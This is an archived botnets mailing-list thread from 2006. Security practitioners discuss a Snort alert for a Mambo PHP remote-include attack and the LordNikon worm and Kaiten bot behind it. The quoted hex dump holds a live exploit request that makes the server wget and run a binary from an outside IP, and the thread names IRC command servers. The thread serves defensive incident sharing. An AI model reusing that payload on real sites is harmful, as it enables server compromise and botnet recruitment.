To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- I monitored LordNikon earlier this year, an extract of activity can be found here; http://www.ecs.soton.ac.uk/~cet/kxx.txt Chas
________________________________ From: PinkFreud [mailto:[EMAIL PROTECTED] Sent: Tue 07/03/2006 22:15 To: [email protected] Subject: Re: [botnets] web remote inclulde path To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ---------- LordNikon is a serial offender. The worm you're seeing there typically downloads a shell script, which int turn downloads precompiled copies of the worm and a Kaiten bot. I've only seen them compiled for Linux, though I know he's snagged a few FreeBSD systems in the past (presumably using the Linux compatibility layer). LordNikon has claimed in the past that the bots aren't for his use, except to sell to someone else. These are *nix machines, and the webserver user is typically not root - hence, the worm only uses the webserver account. If the machine is restarted, or the worm + bot processes otherwise killed, they shouldn't be able to restart, in theory. In practice, though, the script is stupid, which tends to cause an interesting problem: Even if the distribution server goes down, other compromised machines will wind up attempting to reinstall the worm + bot. As you might have noticed, when LordNikon does a run, you get a LOT of hits from the worm running on numerous machines. If the script, worm, and bot still exist (he usually dumps them in /tmp, though I think he's started using /tmp/a at some point), the script will run, and although it'll fail to download the worm and bot, it'll still execute the existing copies, which brings the bot back to life. This also means that any given compromised server may have several instances of the bot running on it - the longer the worm spreads, the more copies it's likely to have running. Note that LordNikon is Romanian. Good luck trying to get him shut down. On Tue, Mar 07, 2006 at 02:59:42PM +0100, bodik babbled thus: > hi, > > this list seems to be for white Jedi ;) so I'll add my contribution. > Even with low expirience I believe I found botnet through snort report > about WEB remote include path: > > #(8 - 452097) [2006-03-07 08:20:04] [local/2002] [snort/2002] WEB-PHP > remote include path > IPv4: 194.249.251.5 -> XXX.XXX.X.XX > hlen=5 TOS=0 dlen=360 ID=23207 flags=0 offset=0 TTL=49 chksum=38897 > TCP: port=44448 -> dport: 80 flags=***AP*** seq=6723088 > ack=1590922881 off=5 res=0 win=5840 urp=0 chksum=17886 > Payload: length = 320 > > 000 : 47 45 54 20 2F 63 76 73 2F 6D 61 6D 62 6F 2F 69 GET /cvs/mambo/i > 010 : 6E 64 65 78 32 2E 70 68 70 3F 5F 52 45 51 55 45 ndex2.php?_REQUE > 020 : 53 54 5B 6F 70 74 69 6F 6E 5D 3D 63 6F 6D 5F 63 ST[option]=com_c > 030 : 6F 6E 74 65 6E 74 26 5F 52 45 51 55 45 53 54 5B ontent&_REQUEST[ > 040 : 49 74 65 6D 69 64 5D 3D 31 26 47 4C 4F 42 41 4C Itemid]=1&GLOBAL > 050 : 53 3D 26 6D 6F 73 43 6F 6E 66 69 67 5F 61 62 73 S=&mosConfig_abs > 060 : 6F 6C 75 74 65 5F 70 61 74 68 3D 68 74 74 70 3A olute_path=http: > 070 : 2F 2F 32 30 34 2E 38 33 2E 35 36 2E 31 34 34 2F //204.83.56.144/ > 080 : 63 6D 64 2E 67 69 66 3F 26 63 6D 64 3D 63 64 25 cmd.gif?&cmd=cd% > 090 : 32 30 2F 74 6D 70 3B 77 67 65 74 25 32 30 32 30 20/tmp;wget%2020 > 0a0 : 34 2E 38 33 2E 35 36 2E 31 34 34 2F 67 69 63 75 4.83.56.144/gicu > 0b0 : 70 6F 3B 63 68 6D 6F 64 25 32 30 37 34 34 25 32 po;chmod%20744%2 > 0c0 : 30 67 69 63 75 70 6F 3B 2E 2F 67 69 63 75 70 6F 0gicupo;./gicupo > 0d0 : 3B 65 63 68 6F 25 32 30 59 59 59 3B 65 63 68 6F ;echo%20YYY;echo > 0e0 : 7C 20 20 48 54 54 50 2F 31 2E 31 0A 48 6F 73 74 | HTTP/1.1.Host > 0f0 : 3A 20 31 34 37 2E 32 32 38 2E 34 2E 32 30 0A 55 : XXX.XXX.X.XX.U > 100 : 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C ser-Agent: Mozil > 110 : 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 la/4.0 (compatib > 120 : 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B 20 57 69 le; MSIE 6.0; Wi > 130 : 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 29 0A 0A ndows NT 5.1;).. > > > compiled bot downloaded though propagated script is trying to contact > servers at: > * irc.ridernet.org:6667 > * 12.205.151.144:6667 > > > bodik -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome. _______________________________________________ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets _______________________________________________ botnets mailing list To report a botnet PRIVATELY please email: [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
